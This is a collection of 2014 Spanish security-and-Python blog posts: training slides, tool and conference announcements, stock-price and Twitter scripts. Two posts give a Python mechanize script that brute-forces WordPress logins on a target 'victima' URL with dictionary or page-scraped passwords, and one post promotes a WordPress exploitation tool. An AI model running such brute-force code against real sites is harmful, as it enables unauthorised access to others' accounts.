jueves, 31 de julio de 2014

Nmap.- Fortificado Con Vulscan

Segundo día después de tener una fuente de Internet aceptable y echando mano de recomendaciones tal y como os dije en entradas anteriores. Hoy os recomendaré una  entrada que hizo mi buen amigo Snifer, al cual tengo un poco olvidado ahora que estoy de vacaciones. 

Snifer hablaba de como fortificar Nmap, usando Vulscan un Nmap Script Engine capaz de buscar vulnerabilidades y de la procedencia de todos los cvs que utiliza Vulscan.  Con lo ultimo (el tema de los .cvs) me ha dado la idea de crear un scaner de vulnerabilidades propio, ya sabéis lo que me gusta hacerme mis propias herramientas si puedo. Así que, creo que será un proyecto bastante chulo para afrontarlo este verano. 

Os recomiendo que os leáis la entrada ya que deja ejemplos de como utilizar este NSE junto a Nmap (canela fina xD): 

miércoles, 30 de julio de 2014

Slides.- Seguridad Informatica Para Todos

Después de un día haciendo lo imposible "guiño guiño" para tener Internet, he hecho un poco de repaso a todas esas micro-entradas que tenía pendiente publicarlas o que me han servido para armar las que ya habéis visto. 

Hoy os voy a dejar el enlace a unas Slides que me sirvieron como guía para la serie de entradas de Introducción a la Seguridad Informática  que habéis podido ver. La verdad es que me gustaron mucho por el humor y la personalidad que derrochan y si yo hubiera podido agregarle esa pizca de humor a las mías lo habría hecho sin dudarlo.

Las podéis ver y descargar desde este enlace:

Sed Buenos ;) 

lunes, 28 de julio de 2014

Video.- El Decalogo de Seguridad del Maligno.

Como algunos de vosotros ya os habréis dado cuenta, hoy he empezado las vacaciones. Esto no quiere decir que deje la seguridad informática de lado, es mas, aún hay algunos asuntos que se han de preparar para setiembre. Pero, si que habrán mas infografias o videos en este blog a no ser que esté tocando algo que tenga muchísimas ganas de explicaros.


Dicho esto, antes de partir, me he estado empapando algunos videos que tenia guardados para estas ocasiones. Este me ha gustado mucho, ya que seguro que todos habéis oído hablar del Maligno o de Chema Alonso. Bueno, pues que sepáis que también tiene un canal de youtube y cuando le da sube videos. La mayoría son de ponencias suyas y la verdad es que merece que les echéis un ojo. 


Aquí tenéis su canal de Youtube:

Sed Buenos ;) 

domingo, 27 de julio de 2014

Video.- Bugtraq Optimus Explicado Por Bugtraq Team

Como ya os anuncié ayer, en unas lineas un poco offtopic para lo que son mis entradas, la nueva versión de la distro de Bugtraq Team ya ha visto la luz y os la podéis descargar desde el siguiente enlace:


La verdad es que esperaba la llegada de esta distribución destinada a la seguridad informática.Así que es hora de darle caña y que mejor manera de hacerlo que empapándome el vídeo que han hecho la gente de Bugtraq y que espero que a todos os guste y aprendáis con el. 


Sed Buenos con esto ;) 

sábado, 26 de julio de 2014

Infografia.- Facebook Puede Rastrearte Incluso Si No Tienes Cuenta.

Gracias a las famosisimas Cookies que las paginas webs incrustan en nuestro navegador Facebook es capaz de rastrearte. Aunque solo guarda las características de tu equipo y puede ver tus búsquedas lo hace sin que hayas querido utilizar el servicio. Así que,  si habéis pasado por la pagina principal de Dacebook alguna vez en vuestra vida y no habéis limpiado las cookies Facebook aun os persigue. 



Para mas información y fuente de la noticia:


OJO en 30 minutos tendreis la nueva versión de la distribución linux Bugtraq.  Estad atentos a este enlace:
Sed Buenos ;) 

Slide.- Introducción a la Seguridad Informatica. [7] (Protección: Sniffing, Spoofing y Hijacking)

Viernes por la noche/sábado por la mañana y hoy acabo con estas Slides, espero que os hayan gustado y también os voy a dejar una versión con todas las Slides juntas para aquellos que no queráis tragaros las 7 entradas. 

Hoy he hablado sobre medidas de Protección frente al Sniffing, Spoofing y Hijacking todas utilizando el sentido común y espero desarrollar la parte técnica a través de las practicas. También hay muchas medidas de protección que se nombran en otros puntos de la misma formación por lo que no pienso ser repetitivo. 

Espero que os guste: 


Aquí os dejo el pack completo para que me deis vuestra opinión (56 Diapositivas, se dice rápido):


"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 

jueves, 24 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [6] (Sniffing, Spoofing y Hijacking)

Hoy toca hablar de Sniffing, Spoofing y Hijacking. La verdad es que me ha costado un poco montar estas Slides y si fuera por mi lo explicaría todo desde un enfoque mas básico. (Lo cual dependiendo del nivel que vea si que lo haré) Bueno, dicho esto, espero que os guste.  Los que llevais tiempo en el mundo de la seguridad informática no os vendrá de nuevo pero a los que os esta gustando y queréis aprender un poco mas quizás si.

Os dejo la Slide aquí: 


Ojo, el tocho manual aun no está actualizado ya que he de empaparme bien de las herramientas de auditoria IDEA y ACL. 
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 

miércoles, 23 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [5] (Introducción al Malware)

Como bien os dije ayer este viernes es el ultimo día, si me he distribuido bien el tiempo, en el que subiré esta serie de entradas dado que la formación ya tendrá todos los puntos que me han pedido y pasara a estar en fase de evaluación. Está claro que todos los puntos que pongo en estas Slides irán con su correspondiente explicación, anécdotas y algún que otro experimento. Siendo sinceros el puntos que me da mas miedo es el de mañana. 

Bueno, dicho esto, os dejo las slides relacionadas con el Malware. Espero que os gusten.


Como no, podéis ver mas contenido en el "tocho manual" de la formación:

Estas Sildes no hubieran sido posibles sin la gran ayuda que es para todos:


"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."

Sed Buenos ;) 

PD:  Mañañana halaremos de Sniffing, Spoofing y Hijacking. Crucemos los dedos xD 

Slide.- Introducción a la Seguridad Informatica. [4] (Vulnerabilidades, Exploits y Actualizaciones)

Ayer, cuando repase la Slide de ayer me di cuenta que había metido mas temario del que tocaba en el punto de las vulnerabilidades. Así que lo que he hecho es dedicarle toda la Slide de ayer al punto de la formación por que me parece que las vulnerabilidades y los exploits son un tema que se ha de tratar de la mano. También he  optado por hacerle caso a Snifer de una vez y aportar un glosarios un poco mas extenso que solo el sombre de los Hackers de sombrero de color y una introducción a CVE.

Working working ... 

Slides Actualizadas: 
Como siempre en el "tocho manual" dejo alguna que otra pincelada mas para que la formación sea mas completa.  Espero que os guste,  a mi me hubiera gustado que un profe me diera todo de esta forma. 
Sed Buenos y aguantad que en tres días acabos las Slides. ;) 

lunes, 21 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [3] (Vulnerabilidades)

Ya es lunes y volvemos con la serie de Slides para la Formación que tendré que dar en Septiembre y ya que la hago desde zero pues os las cuelgo para que me ayudéis y aprendáis.  Ademas, ya me va bien repasarlo todo desde zero así refresco conocimientos. Bueno, dicho esto,  os dejo el nuevo punto que he hecho hoy. Esta dedicado a aprender que es una vulnerabilidad, cuales hay y como podemos luchar contra ellas. 

Aquí os dejo la presentación y espero que os guste:


También he actualizado el "tocho manual" por si queréis mas información: 
Estas Sildes no hubieran sido posibles sin la gran fuente de información que son:
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa."
Slides Antiguas: 


Sed Buenos ;)

domingo, 20 de julio de 2014

Canal Pirata de Snifer XXV - Aprende HTML5 sin escusas.. PARTE I

Otro dormingo que venimos al rincon de @State_X aka el gringuito ;) con el canal pirata de Snifer en esta oportunidad les presento un pequeño, pack de libros referentes a html5 asi que a dar rienda suelta a su imaginación :).


HTML5 Canvas CookbookHtml5 Boilerplate Web Development
What Is HTML5HTML5 Geolocation
HTML5 HacksHTML5 for Publishers
HTML5: Up and RunningHTML5 Media

Descargar Libros: Aquí
Regards,
Snifer

sábado, 19 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [2] (Conociendo a la Comunidad)

Siguiendo con esta serie de entradas, hoy os dejo la segunda parte de la formación. Esta parte no está en los objetivos pero a mi me parece algo esencial conocer a una comunidad tan rica. Ademas, aprovechando que casi todos los cracks en esto tienen un blog y hay paginas especializadas en noticias sobre seguridad como Una al Dia, la cantidad de información diaria es esencial para el desarrollo de un estudiante de seguridad. 


Se que con tantos logos no se entiende de todo bien y que a mas de uno le gustaría tener toda esta información. Así que también os he subido el "tocho manual" (como yo le llamo) el cual iré actualizando con la información del curso.

Manual:

"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa."
 Como os debo una entrada la guardare para las posibles actualizaciones que me vayáis mandando por los comentarios.

Sed Buenos y espero que os guste ;)

Slide.- Introducción a la Seguridad Informatica. [1] (Muy Basico)

Hace tiempo que quería volver a subir slides y la verdad es que hacia un mas tiempo que os había prometido que subiría algunas mas. Pues hoy, ya que estoy preparando slides para una formación he decidido que os las voy a ir subiendo a medida que vaya haciendo. Es una formación sobre seguridad informática bastante básica pero bastante extensa. Así que, ya me va bien a mi para repasar cosas que creía sabidas y espero que a vosotros os gusten. 


Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa.

Sed Buenos ;) 

viernes, 18 de julio de 2014

Malwarebytes.- Haciéndonos La Vida Mas Fácil.

Los que hayan tratado conmigo por algún problema informático ya lo sabrán, pero para los que no, yo siempre he recomendado hacer una pasada con el Anti-Malware de Malwarebytes antes de meterme en cosas mas serias. Malwarebytes era un anti-malware de pago donde podías descargarte una versión de prueba que se actualizaba al acto e iba genial. Pero ahora no, Ahora podemos disponer de una versión totalmente gratuita pero sin escudo en tiempo real y de una versión premium donde se sigue manteniendo la descarga de prueba. 


En mi opinión me parece genial que existan estas dos versiones yo seguiré con la versión de prueba pero, siempre se agradece tener una versión completamente free. Ademas,  rebuscando por la web del equipo de Malwarebytes podemos encontrar bastantes herramientas gratuitas que nos ayudarán a mejorar la seguridad de nuestros equipos. 

Pagina de descarga de herramientas: 

Me encanta que las empresas de seguridad empiecen a mimar al usuario de esta manera. La verdad, merecen mucho la pena y espero que les echéis un ojo. 

Sed Buenos ;) 

martes, 15 de julio de 2014

CheckiO.- El Videojuego Para Aprender Python

La verdad es que Python es un lenguaje muy fácil de aprender y con muchísimas posibilidades, tanto es así, que muchas universidades ya están introduciendo Python como lenguaje de introducción. Ademas cada vez están saliendo nuevas oportunidades de aprenderlo y hasta de forma interactiva. CheckiO es un Videojuego donde se plantean retos, subes niveles y hasta desbloqueas nuevas zonas. 


Totalmente recomendado. Ademas, los retos son bastante difíciles así que para quien quiera superarse aquí os dejo el enlace.
  • http://www.checkio.org/
Sed Buenos ;) 

Infografia.- ¿Como Puedo Proteger Mi Facebook?

La verdad y por muy fácil que parezca concienciar a las personas de que hagan un buen uso de sus redes sociales puede llegar a ser algo tedioso si tenemos que explicarle que comporta el Https, que la app de su smartphone aunque se conecte de forma igual a su cuenta puede ser vulnerada ya que no esta bajo la protección de su pc, etc. Para eso y para que todos lo sigáis que no cuesta nada mantener vuestro Facebook seguro. 

 Sed Buenos y seguid estos consejos que los de Kaspersky saben ^^

domingo, 13 de julio de 2014

Canal Pirata de Snifer XXIV - Recopilación de Documentos sobre Perl

El dia viernes vi que el gringuito andaba yendose por Perl ¬_¬° y no fue capaz de dcirme snifito snifito donde puedo conseguir libritos de Perl :'( me tiene olvidado....

Hablando enserrio, como asben ando un poco perdido desde el miercoles o jueves retorne al blog, a dar mas impulso a lo que me apasiona, como tambien me olvide de nuestro amigo gringo, con las entradas piratas del canal :), ya que lleva Albert con Perl comenzando hacemos un pequeño pack por decirlo para que pueda meterse a fondo en este lenguaje hace un año y algo mas tuve el gusto de conocer algo de este lenguaje y me parecio bastante facil de aprender pero no le tome mucho interes, xD quizas porque andaba mal luego de la operación pero que va este recopilator se viene de mi blog que data de Febrero del 2013  lo postee en ese entonces como:

Recopilación de Documentos sobre Perl

En esta oportunidad venimos con lo mismo :)


Perl Tutorial Hub  este fue el primero que di una excelente recopilación de documentos


Cheat Sheets 



Perl for dummies Cheat Sheet




Documentacion en Español

Manuales en Web Taller
Tutorial de Perl
Introducción al Lenguaje Perl

Documentacion Ingles

Perl.org
PerlDoc
OPP in Perl
Perl Functions References


Se que mi querido amigo Albert lo tomara mas a fondo porque quiere engendrar algo de el en Gojira ;), asi que a darle duro querido amigo.

Regards,
Snifer

sábado, 12 de julio de 2014

Wickr.- Top-Secret Messenger

Todo el mundo que este medio metido en este mundo sabe que muchos de nosotros vivimos en una constante paranoia y no nos fiamos ni de [Telegram] por razones obvias. La CiberSeguridad es una diciplinar en constante actualización y crecimiento. Sobretodo ahora que la gente esta empezando a ver lo importante que es la seguridad en su cibervida o al menos para que no le roben el Wifi. Por eso, me encanta encontrarme con sistemas de mensajería cada vez mas seguros. 


Wickr es una aplicación de mensajería como lo son Watssap o Telegram desarrollada por la hacker [Nico Sell], fundadora de [r00tz] y una de las organizadoras de la popular conferencia [DEFCON]. Así que de segurida, esta mujer sabe. Ademas esta desarrollada para Android e IOS. 

Opciones de seguridad que nos ofrece esta app: 
  • La comunicación se realiza utilizando redes Peer-to-Peer cifradas y no hay servidores centralizados.
  • El ID y la la información del dispositivo son hasheadas criptográficamente con múltiples rondas de SHA256 + SALT
  • Los datos en reposo y en tránsito se cifran con AES256
  • La contraseña y los hashes de la contraseña no se dejan en el dispositivo
  • Los mensajes son eliminados de forma forense (wipping) después de que caducan
  • Las claves se utilizan una única vez y se regeneran en cada mensaje
  • Los mensajes son cifrados y descifrados en origen y destino
  • El contacto entre usuarios y los servidores de Wickr, se realiza sólo utilizando canales cifrados
  • Wickr nunca entra en contacto con las contraseñas de cifrado
  • Wickr borra los mensajes despues de la entrega
La verdad es que ahora mismo voy a probarla a ver si le puedo sacar alguna pega. Pero, se ve genial desde mi punto de vista y el wipping de los mensajes me ha enamorado. 

Para descargar esta app os direcciono a la fuente de esta entrada. Así le dais una visita ya que merece la pena que todos la conozcáis: 

viernes, 11 de julio de 2014

Aprendiendo Perl.- Teach Yourself Perl 5 in 21 days

Hace unos días buscando tutoriales/libros/paginas parecidas a Codecademy para aprender Perl, encontré este libro el cual, me recuerda muchísimo a [Learn Python The Hard Way] y la verdad es que estoy aprendiendo muchísimo con el. Así que os lo recomiendo encarecidamente. 


Enlace al Libro: 
He de ponerme al dia en Perl si quiero programar algún modulo para [g0jira], así que a por todas ò-ó espero que os interese tanto como a mi. 

Sed Buenos y divertiros desarrollando ;) 

jueves, 10 de julio de 2014

Programar y Hackear [5].- Una Aproximación A Un Advance Brute Force WordPress

Como ayer os [prometí], hoy me he estado gran parte de esta mañana intentando mejorar el Simple Brute Force para WordPress. Que aunque ponga WordPress en el titulo de la entrada es extrapolable a otras paginas con sistemas de login parecidos. Esto es una aproximación que he hecho con el tiempo que he podido por lo que, no funciona bien pero es un avance y me sirve para explicaros lo que en realidad quiero hacer con este script. 


Si os fijáis en el código de abajo, le he agregado una segunda opción y lo he arreglado un poco para que sea mas claro y no estorbe el código. En una de ellas he respetado el codigo original cambiando solo una variable mientras que en la otra he usado la magia de "split()" para separar strings, guardarlos en una lista para usarlos luego como passwords para el ataque. 


import mechanize
import urllib

def ataque(passwords):
usuario = raw_input("Usuario: ")
for password in passwords: 

r = br.open(url2)
br.select_form(nr=0)
br.form["log"] = usuario
br.form["pwd"] = password
br.submit()
respuesta = br.response().geturl()

if respuesta == url + "/wp-admin/":
print usuario + " : " + password + "--> Si"
else:
print usuario + " : " + password + "--> No" 

br = mechanize.Browser()
url = raw_input("URL http://victima.com: ")
url2 = url + "/wp-login.php"

d1 =  raw_input("[a= usar tu propio dicionario] [b= hacer uno con strings de la pagina]: ")

if d1 == "a": 

archivo = open('lista.txt', 'r')
diccionario = archivo.readlines()
ataque(diccionario)

elif d1 == "b":

busqueda = urllib.urlopen(url).read()
datos= busqueda.split()
d3 = str(datos)
diccionario2 = open('Strings.txt', 'a+')
diccionario2.writelines(d3)
ataque(diccionario2)

else: 
print "solo entiende a o b ..."

Espero que os guste y iremos mejorando este script a medida que pase el tiempo hasta que podamos limar estos slipts hasta convertirlos solamente en palabras para usarlos como contraseña. Ya que Wordpress no limita un ataque de fuerza bruta.

Sed Buenos con esto ;)

miércoles, 9 de julio de 2014

Programar y Hackear [4].- Simple Brute Force WordPress

El script, en python of course, del que os voy a hablar hoy viene de la mano de la gente de [websec.es] y es que quiero que veáis lo fácil que es intentar hackear algo, en este caso un wordpress, si sabemos programar, entender y modificar a nuestra manera los scripts que hay colgados en la red. 


En el caso de python y demás lenguajes de programación interpretados, hacer funcionar un script será tan fácil como copiar todo el código en nuestro editor y guardarlo como .py a no ser que dependa de librerías especificas que si que tendremos que instalar. En el caso del siguiente código, depende de la librería [Mechanize] la cual,  nos permitirá rellenar campos de una web. 
  • Así que,  abrimos la consola y escribimos pip install mechanize y luego ejecutamos el siguiente código. 


Mas información sobre este script totalmente detallada en: 
Pero en plena vorágine de herramientas para demoler la seguridad de Wordpress como [g0jira] un Brute Force sencillo sabe a poco. Así que, para mañana prometo traeros una versión mejorada de este script para que veáis que aprender Python no es ninguna tontería.  Pero, de momento podéis instalaros el modulo, copiaros el código en vuestro editor de código favorito y teniendo a mano una lista de contraseñas, probarlo. 

Sed Buenos con esto ;)  y aprended mucho mas.  

martes, 8 de julio de 2014

No cON Name.- Inscripción

Que puedo deciros yo del primer congreso al que asistí gracias a Mercé Molist. Para mi son dos días envuelto en el mundo que me gusta. Me lo paso genial hablando con Mercé y toda la gente de la NocONName, trabajando con las camisetas de Hackstory, viendo ponencias, apuntándome todo lo que puedo y mas, comiendo cruasanes cuando la pasta no me llega para los bocatas caros del museo (los que hayáis estado lo sabréis xD) y sobre todo con el buen ambiente que se respira. 


Dos días en el mundo hacker, en Barcelona y en el CosmoCaixa. Un lugar que siempre me ha encantado desde pequeño. ¿Qué mas puedo pedir?

Ayer se abrieron las inscripciones para la nueva edición que tendrá lugar los días 31 de octubre y 1 de noviembre. Así que, os dejo el enlace de la inscripción para que le echéis un ojo y si os gusta os apuntéis a todo lo que os ofrecen. 

Página de inscripción: 
Sed Buenos ;)  ¡Nico quiero una camiseta azuuuul! xD

Navaja Negra Conference.- Entradas

Hemos hablado muchísimo, [sobretodo este ultimo año], sobre este congreso que se ha ido abriendo paso hasta convertirse, en mi opinión,  en  uno de los grandes en España. Aunque solo hace falta ver los ponentes y la calidad de las ponencias para saber que no es solo mi opinión.


Para quien no lo sepa este congreso se hace en Albacete y llevan tres ediciones anteriores. Si tenéis curiosidad os recomiendo visitar su página web para que podáis ver todo lo que mueve este congreso. 

Página web:

Si os convence y sois de la zona o podéis desplazaros os adjunto la pagina para que podáis comprar las entradas. Ojo miraros bien los tipos ya que podéis obtener una entrada reducida acreditando que eres estudiante. Así que eso es muy interesante.  Sobretodo para los, me incluyo, nos gustaría ir pero no tenemos todo el dinero que nos gustaría. 

Página entradas:

lunes, 7 de julio de 2014

#IBEX35.- Experiment Alpha With #Tweepy, #Python and #GoogleFinance

Como habréis podido ver en Twitter y si no os lo explico ahora, hoy iba a mirar un poco [mi cliente de Twitter] del que os hable hace ya unos días. Pero, ya que fui capaz de [obtener valores a través de Google Finance y Python], me ha hecho gracia montarme un programa que hiciera un tweet por cada valor del IBEX 35 y lo repitiera cada n segundos. Si, podría haber hecho que cuando me detectara un cambio lo anunciara, pero no hubiera sido tan divertido como hacer enfadar a Twitter xD. 


Buscando la lista del Ibex35 por que de memoria no me las se aún y con un poco de ayuda de while y las listas he podido hacer un prototipo que me devolviera por la pantalla los valores como podéis ver. Por lo que solo he tenido que fusionar los dos scripts y hacerme otra cuenta para los Key de acceso y tokens (como es un script para una cuenta concreta el uso de mis tokens es necesario para no comerme la autentificación a través de pin) por lo que ha nacido el siguiente código.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib, re, os, time
import tweepy


def valoracion(busquedaGoogle):
url =  "http://www.google.com/finance?&q="
busqueda = urllib.urlopen(url+busquedaGoogle).read()
datos = re.search('id="ref_(.*?)">(.*?)<',busqueda)
if datos: 
t = time.localtime()
tiempo =[t.tm_year,t.tm_mon,t.tm_mday,t.tm_hour, t.tm_min,t.tm_sec]
t1= busquedaGoogle +" --> "+ datos.group(2)+" <-- "+ str(tiempo)
tweet(t1)

else: 
out = "No he podido encontrar nada con " + busquedaGoogle
tweet(out)
def tweet(contenido):

CONSUMER_KEY=""
CONSUMER_SECRET=""
ACCESS_KEY=""
ACCESS_SECRET=""
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
api.update_status(contenido)

if __name__ == "__main__":
Lista35= ["BME:ABG.P","BME:ABE","BME:ANA","BME:ACS","BME:AMS","AMS:MT","BME:POP","BME:SAB","BME:BKIA","BME:BKT","BME:BBVA","BME:BME","BME:CABK","BME:DIA","BME:ENG","BME:FCC","BME:FER","BME:GAM","BME:GAS","BME:GRF","BME:IAG","BME:IBE","BME:ITX","BME:IDR","BME:JAZ","BME:MAP","BME:TL5","BME:OHL","BME:REE","BME:REP","BME:SCYR","BME:SAN","BME:TRE","BME:TEF","BME:VIS"]

while True:
for item in Lista35:
valoracion(item)

Y la siguiente cuenta de Twitter: 

La cual ha sido pillada por exceso de tweets:


La verdad es que me ha encantado ponerme manos en la masa con esto y no me arrepiento de que hayan suspendido la cuenta. Ahora toca pensar como poder hacer esto de una manera menos agresiva. Por cierto, os dejo la foto del error que te salta cuando excedes el limite de tweets.


Sed Buenos ;)

Creando Un setup.py Para Nuestro Modulo.

La primera entrada de hoy ya que ayer me tuve que pelear con mi ISP.  La verdad es que estuve enredando toda la mañana de ayer con la importación de funciones de un .py a otro. Así que, se me ocurrió  que, ya que estaba puesto,  podía investigar un poco como funcionaba el setup.py de los módulos que nos instalamos día a día para Python.  


La verdad es que gracias a la flexibilidad de python montarnos un setup.py es muy fácil. Solo necesitamos nuestro script el cual ahora llamaremos modulo bien hecho con su if __name__ == "__main__": con sus funciónes  y el siguiente script llamado setup.py. 

from distutils.core import setup
setup(name='Nombredelmodulo',
      version='0.1',
      py_modules=['CopiaPegaElNombreDeTuModuloSinel.py'],
      )

Lo guardamos en la carpeta donde esta nuestro modulo y ejecutamos el comando python setup.py install 

Podéis complicar este script de instalación tanto como queráis, solo hace falta ver el setup.py de tweepy la api de tweeter de python, es inmenso. Para que profundicéis un poco mas en ellos os dejo el enlace a la información oficial del modulo distutils. 
Sed Buenos ;) 


domingo, 6 de julio de 2014

Python y Google Finance.- Obteniendo Valores de Bolsa

Los que hayas seguido mi twitter hoy, ya habréis intuido de que vamos hablar de blosa de valores y con lo que ello comporta, de dinero.


Para los que no conocéis Google Finace es un servicio donde poder ver la cotización de un valor de bolsa, su gráfica dividida por años,meses y días ademas de poder hacer un portafolio para que te sea mas fácil consultar tu cartera. Pero, para que tengo que estar yo dando le a Enter todo el rato si se programar (poco pero algo se) en Python.  

Para hacer esto nos serviremos de la url [http://www.google.com/finance?&q=] que usa el servicio cuando ha de consultar un valor y le concadenaremos el nombre de la acción y como la consulta ya se hace en Google Finace me ahorro problemas de acentos y problemas de ortografía. Ojo, no me los ahorro del todo, si no sabéis el nombre aproximado de la acción no aparecerá. Por ejemplo ¡, si queremos que nos muestre el valor de Telefónica, [al haber varios valores que se llama igual], nos dará error. Así que deberemos saber que Telefónica España es llamado NYSE:TEF. 

Dicho esto,  pasamos a ser un francotirador de acciones dispuesto a estar al tanto de la mas mínimo cambio en su cartera. 


import urllib, re, os, time


def valoracion(busquedaGoogle):

        #Esto esta explicado en la entrada XD
url =  "http://www.google.com/finance?&q="
busqueda = urllib.urlopen(url+busquedaGoogle).read()

        #con regular expresions podemos buscar el campo id= ref_
datos = re.search('id="ref_(.*?)">(.*?)<',busqueda)

t = time.localtime()
if datos: 
                #Con esto imprimimos de forma chula los el precio de la acción
tiempo =[t.tm_year,t.tm_mon,t.tm_mday,t.tm_hour, t.tm_min,t.tm_sec]
print tiempo
print  busquedaGoogle +" --> "+ datos.group(2)
else: 
out = "No he podido encontrar nada con " + busquedaGoogle
print out
       #Cada 10 segundo la acción se irá actualizando (que es mas que suficiente para ver cambios)
time.sleep(10)
os.system('cls')
while True:
valoracion(d1)

if __name__ == "__main__":
d1 = raw_input("Nombre de la Empresa: ")
os.system('cls')
valoracion(d1)
Podéis buscar este valor, la bolsa española
ha cerrado a las 9:30 por lo que esta a este mismo valor. 

Espero que os haya gustado este script, no lo he subido en GitHub por que ya hay muchos y le quiero dar otro uso que espero publicarlo aquí en unos días. Ahora no tenéis escusa por no vender si vuestra acción a a un valor que hace saltar vuestro Stop. 


No dejes que vuestro trader os engañe xD Como veis he fusionado Mi Hora de Codigo con StateX me espera unas vacaciones dignas. Gracias a todos los que votasteis en la encuesta. 

Sed Buenos ;) y si gracias a este script conseguís ganar algo de dinero invitadme a una cerveza .

viernes, 4 de julio de 2014

g0jira.- Pwning Wordpress

Mientras el [pucherazo de ayer] aun está vivo (ya sabéis que vosotros decidís si darme vacaciones o ayudarme) @TheXC3LL un compañero del blog [Estación Informática] a presentado su herramienta para "testear la seguridad de nuestro wordpress" a través de diversas vulnerabilidades. Está programada en PERL y aunque no está completada tiene muy buena pinta. 


"¿Qué es g0jira? Es un -intento de- framework/herramienta/llámalo X para escanear y explotar vulnerabilidades conocidas en WordPress y sus plugins. WPScan es sin duda una herramienta completa y que cumple bien sus funciones, pero odio depender de las herramientas de terceros cuando se trata de cosas sencillas de implementar. Es por ello que empecé a codear esta herramienta."
Podéis descargarla de aquí:


Muchísima mas información:

jueves, 3 de julio de 2014

Pucherazo.- Algunas Reformas ¿Qué Opináis?


Esta debería de ser la típica entrada emotiva que tendría que haber salido para las 50.000 visitas pero he ido demorando hasta las 65.000 y ya que he querido hacer un autoanalisis con un poco mas de tiempo. He decidido demorarla mas y por eso os traigo algunas propuestas.

(ojo esto solo es aplicables los meses de Julio y Agosto, vamos tomarme unas vacaciones)

Se que este es mi blog y al fin y al cabo, al final haré mas o menos lo que quiera. Pero, ya sabéis que me gusta tener un FeedBack con vosotros a través de encuesta o opiniones. Así os enumero mis propuestas y vosotros decidís. 
  1. Subir entradas solo cuando tenga algo que os quiera enseñar.
  2. Fusionar StateX y Mi Hora de Codigo para poder seguir con las dos.
  3. Seguir tal cual .
  4. Actualizar los dos de forma diaria. 
  5. Tomate unas vacaciones y vuelve con las pilas cargadas.
Podéis votar aquí:


O en este enlace:

Vuestra opinión cuenta. Muchas gracias por a todos los que leéis este blog día a día y encima tenéis los cojones de decirme lo que pensáis. 

miércoles, 2 de julio de 2014

Video.- Entendiendo el OpenSource Con Legos

La verdad es que me ha encantado este vídeo. Pensaba que ya había visto la mayoría de formas para explicar que es el Software Libre pero lo de los Legos ha sido otro nivel xD. Espero que os guste y quien no sepa que es el Open Source le sierva para ir conociendo todo el mundo.


Siento si la entrada os parece algo rápida pero hoy es así xD

Sed Buenos ;) 

Twitter.- Permisos, El Sistema De PIN Con Tweepy y Algunas Opiniones.

Los que me seguís un poco mas por el Twitter que estos días he estado jugando un poco con las apis de Twitter en especial con tweepy. He estado jugando hasta crearme un micro cliente para poder enviar tweet desde la consola fácil, rápido y liviano que creo que son 3 sinónimos que encajan muy bien con Twitter. Ademas, que para [TONTO] me va a ir genial. 

Lista de APIS: 


Pero bueno, no he venido ha hablar de otros proyectos. Así que vamos a lo que vamos. Os voy a explicar el funcionamiento del proceso de "logueo" para nuestra aplicación. 

Primero de todo nos iremos al siguiente enlace y entraremos utilizando nuestra cuenta de Twitter. 
Nos dirigimos arriba a la derecha donde debería estar nuestra foto de Twitter, clicamos en ella y nos vamos a My Aplications. "Registramos" nuestra primera aplicación (ya sabéis, le damos un nombre una descripción y una foto si queremos)
Una vez creada o definida (como queráis) nuestra app podremos configurarla haciendo clic en el nombre y dirigiéndonos al apartado Application settings. Pensad que esto es necesario para que nuestra app se pueda autenticar e utilizar el servicio. Pero, aquí hay una parte que no me gusta nada y es que si tratamos de cambiar los permisos, no podremos restringirlo solo a escritura que era lo que yo quería en un principio y no tiene porque tener derecho a leer tweets si no quiero. 

Una vez las opciones este como nosotros queramos iremos a Api Keys veremos que nos han creado dos ristras de numeros llamadas API key y API secret y mas abajo también hay otras dos llamadas Access token y Access token secret en las que no entrare ya que solo me serviría para loguearme yo y no es mi objetivo. 

Así que nos apuntamos la API key y la API secret y abrimos nuestro editor favorito y le damos caña.

import webbrowser
import tweepy
if __name__ == "__main__":

consumer_key = "Copia Aquí tu API key "
consumer_secret = "Copia Aquí tu API secret"
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
        
Ahora, y por razones de seguridad prefiero no gestionar contraseñas yo en el código así que le quiero enviar todo ese curro a Twitter que ellos saben mas que yo seguro así que nada. Haré que esta aplicación tenga que ser aprobada por el usuario y que una vez sea aprobada para descartar que sea una máquina que el usuario solo tenga que copiar pegar un pin (esto ya lo de Twitter así que no nos preocupamos solo tendremos que verificarlo)

webbrowser.open(auth.get_authorization_url())

pin = raw_input('escrive el pin de twitter.com: ').strip()

token = auth.get_access_token(verifier=pin)

Perfectisimo, solo que otra vez ... Para que necesito tantos permisos si solo quiero escribir un tweet. No tiene sentido. Para quien solo quiera jugar vale, pero imaginaros que tu app es vulnerada o le han cambiado el código... podrían estar automatizando diregido spam con mi API key y mi API secret solo por no capar la opción de leer tweets. 


Así es como funcionaria la implementación de permisos y Pin en App con Tweepy espero que os haya gustado y para enviar un tweet solo haría falta lo siguiente. 

        api = tweepy.API(auth)
api.update_status(raw_input('Dame tu Tweet: '))

